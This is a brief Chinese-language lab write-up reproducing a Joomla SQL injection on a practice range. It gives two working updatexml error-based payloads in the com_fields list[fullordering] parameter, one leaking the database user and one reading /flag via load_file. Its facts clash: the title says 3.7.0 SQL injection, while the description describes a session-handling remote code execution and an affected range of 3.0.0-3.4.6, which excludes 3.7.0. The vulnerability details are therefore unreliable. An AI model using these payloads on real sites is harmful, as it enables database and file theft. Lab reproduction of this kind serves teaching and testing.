Joomla 3.7.0 SQL注入漏洞
漏洞描述:
漏洞本质是Joomla对session数据处理不当,未经授权的攻击者可以发送精心构造的恶意 HTTP 请求,获取服务器权限,实现远程命令执行。
影响范围:
Joomla 3.0.0-3.4.6
环境搭建:
这里采用安鸾渗透实战 地址
漏洞复现:
打开之后页面
安装完成后,构造payload
/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml(0x23,concat(1,user()),1)
看到返回了用户
构造读取文件的payload
0x2f666c6167
是/flag
得hex编码
/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml(0x23,concat(1,load_file(0x2f666c6167)),1)
得到flag
漏洞修复:
升级最新版完整安装包以及升级补丁包